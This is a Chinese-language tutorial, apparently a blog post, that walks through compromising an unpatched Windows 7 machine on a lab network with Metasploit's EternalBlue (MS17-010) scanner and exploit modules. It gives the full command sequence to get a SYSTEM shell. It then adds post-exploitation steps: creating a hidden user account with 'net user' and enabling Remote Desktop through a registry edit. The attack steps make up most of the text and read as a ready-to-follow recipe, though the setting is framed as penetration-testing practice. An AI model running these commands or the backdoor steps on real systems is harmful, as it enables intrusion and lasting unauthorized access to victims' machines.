初次利用metasploit漏洞利用框架,入侵获取win7获取权限

目标机系统:windows7,无修复补丁

目标ip地址:192.168.20.131

任务:利用ms17-010,永恒之蓝漏洞,获取目标系统控制权

1,使用metasploit前,需要开启Postgresql数据库,输入命令service Postgresql start开启服务

2,输入命令msfconsole,启动metasploit,终端界面出现msf5就是启动完成

3,首先确定利用插件目录,输入命令search ms17-010,确定扫描插件目录以便使用

可以看到,

auxiliary/scanner/smb/smb_ms17_010, 这个是扫描ms17-010确定是否有该漏洞的脚本所在目录

exploit/windows/smb/ms17_010_eternalblue ,这个是漏洞利用脚本所在目录

4,利用目录都确定之后,开始正式使用,输入use auxiliary/scanner/smb/smb_ms17_010 ,进入扫描目录

5,进入扫描目录之后,可以show options,查看扫描所需要设置的参数

6,设置参数,输入命令,set rhosts 192.168.20.131,确定扫描主机

7,输入exploit,确定目标主机存在可利用漏洞

8,既然确定可以利用了,那就不客气的搞起了,输入use exploit/windows/smb/ms17_010_eternalblue,进入ms17-010漏洞利用脚本下,set rhosts 192.168.20.131,设置好攻击主机

9,运行exploit,启动攻击,成功拿下,并直接获取了system权限

10,拿下shell之后,当然可以为所欲为,

net user $用户名  /add, 添加一个隐藏用户

net user $用户名 密码,设置隐藏用户的密码

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f,开启3389端口

11,总结

metasploit-framework不愧是做网络渗透测试的必备工具,提供了非常多的常用漏洞利用脚本方便测试人员使用,极大的节省了测试人员时间,是极好的,渗透测试人员要务必精通

最新文章

  1. jquery.datatable.js与CI整合 异步加载(大数据量处理)
  2. coding题都在考察我们的什么技能
  3. CRM 2011 Install Errors - Tips and Tricks continued(转)
  4. javaSE第二十七天
  5. 在C#中调用VBScript和JavaScript等脚本的实现
  6. 30款jQuery常用网页焦点图banner图片切换 下载
  7. hdu 1796 How many integers can you find
  8. 完全掌握Android Data Binding
  9. 一篇文章让你彻底搞清楚Python中self的含义
  10. IOS 6.0+ Autolayout — UITableViewCell 高度调整
  11. mysql字符集问题
  12. 首页布局时div的宽度设置要注意
  13. Java之进程与线程
  14. poj 1523求割点
  15. PHP 5 MySQLi 函数
  16. 操作系统内核Hack:(四)内核雏形
  17. javascript prop和attr的区别
  18. Samples topic
  19. Zephyr的Logging
  20. SpringBoot(十七)_springboot跨域处理

热门文章

  1. LoadRunner脚本优化—迭代的组合用法
  2. linux下shell脚本启动jar包
  3. python小例子(一)
  4. python 线程、进程与协程
  5. Cookie 、session、token都是什么?
  6. 热门开源网关的性能对比:Goku > Kong > Tyk
  7. gym102302E_Chi's performance
  8. FPGA时序约束理解记录
  9. Windows包管理器
  10. NOIP模拟 10